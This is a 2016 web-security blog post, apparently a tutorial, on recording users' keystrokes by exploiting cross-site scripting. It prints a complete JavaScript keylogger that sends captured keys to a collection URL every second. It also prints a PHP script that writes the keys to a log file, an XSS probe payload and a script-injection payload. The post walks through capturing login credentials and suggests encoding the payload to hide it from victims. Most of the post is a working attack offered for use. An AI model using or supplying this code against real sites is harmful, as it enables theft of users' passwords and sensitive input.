Web Security 24x7

Web Security | Web Hacking | Bug Bounty POC | Web Penetration Testing Tools

Saturday, July 16, 2016

Keylogging with Cross-Site Scripting Vulnerability

Pren Host Blog Demo 2:13 PM
Today we will discuss  about  Keylogging using XSS Vulnerability. First of all i will tell you about Keylogging,Keylogging is a technique in which an attacker is able to record all key strokes of the victim by using some methods, the attacker will be able to see all the keys which are pressed by the user. By using this technique all types passwords ,usernames and other sensitive details can be captured.

Description:

Keylogging attacks can be done by using Keylogger Programs but in this article we will do Keylogging attack using Cross Site Scripting vulnerability. In XSS Vulnerability , an attacker is able to execute any JS code on the client-side and using this attack an attacker can steal session of a user , can perform DoS attack, can deface the site. There are main types of XSS ,Reflective and Stored. We will do keylogging using both types of XSS.
For demo i created some files to show you how we can do XSS Keylogging. For XSS keylogging we need a .js file which will record all the keystrokes entered by the user on the webpage and a .php file which will save all the recorded keystrokes to a text file. Now i will show you the source of the both files.

exploit.js

var keys = '';
 
document.onkeypress = function(e) {
    var get = window.event ? event : e;
    var key = get.keyCode ? get.keyCode : get.charCode;
    key = String.fromCharCode(key);
    keys += key;----
}
 
window.setInterval(function(){
    new Image().src = 'http://127.0.0.1/demo/1/exploit/exploit.php?keylog=' + keys;
    keys = '';
}, 1000);

Now in the above code on line 11 you can see that it will send data to the exploit.php file, that URL is the path to theexploit.php , we have to enter it so the .js file will send the recorded keystrokes to the php file so it will be saved in text.

exploit.php

<?php
 
if(!empty($_GET['keylog'])) {
    $logfile = fopen('logs.txt', 'a+');
    fwrite($logfile, $_GET['keylog']);
    fclose($logfile);
}
?>

on line 4 it will open the logs.txt file and will add the keystrokes in it and will be saved. So this will do all the saving works.

Now we will open a site and will test for XSS, in this article i will be using a demo file which have a login panel and a comment area, the comments which are entered are saved to the database and are shown in the “Comments” area. The comments which are shown in the comments area are printed as they are inputted, and are printed without any filtering so it will cause a XSS Vulnerability.
So after we submit anything in the Name and Feed Back field, it will be shown in Comments and will be saved there whenever the page will be loaded, so now we will input an XSS payload just to check if its vulnerable to XSS, we will input “><img src=x onerror=prompt(1)> and will submit it.

  If the site is vulnerable to XSS, it will show a popup box with a number “1” , as you can see in the image below, it shows a popup and our payload is injected into the webpage as HTML code so XSS is possible:
This test proves that the site is vulnerable to XSS, now its time to inject our Exploit so we can do Keylogging, now instead of “><img src=x onerror=prompt(1)> , we will use a different payload so we can insert a .js file directly, we will use <script src=”location of .js”></script> we will enter this payload and will insert path of our exploit.js file so it will be loaded inside the web page. This will inject our Keylogger into the XSS vulnerable page.
After we injected the Keylogger, it will record all keystrokes which are entered by the user who is on the web page. Now we will try entering some credentials in the Login Panel so we can see if it records our keystrokes or not. We will enter “Shawar” as username and password:
Now as we type the credentails, it should be recorded by the keylogger(exploit.js) and the exploit.php file should save the keystrokes to the logs.txt file, lets check the logs.txt file:
In the above image, you can clearly see that the credentials are saved and are logged to logs.txt file. This is how we are able to record keystrokes of a user in a XSS Vulnerable site. This method was shown on a Stored XSS Vulnerable site and the same method can be used in a site which is vulnerable to Reflective XSS. We just need to encode our payload so the user will not be able to see our malicious code. Its better if we use a Stored XSS Vulnerable site.

Demo:

Thanks Shawar Khan
,

3 comments:

Subscribe to: Post Comments (Atom)

Recent Posts

Recent Posts Widget

Popular Posts

Contact Form

Name

Email *

Message *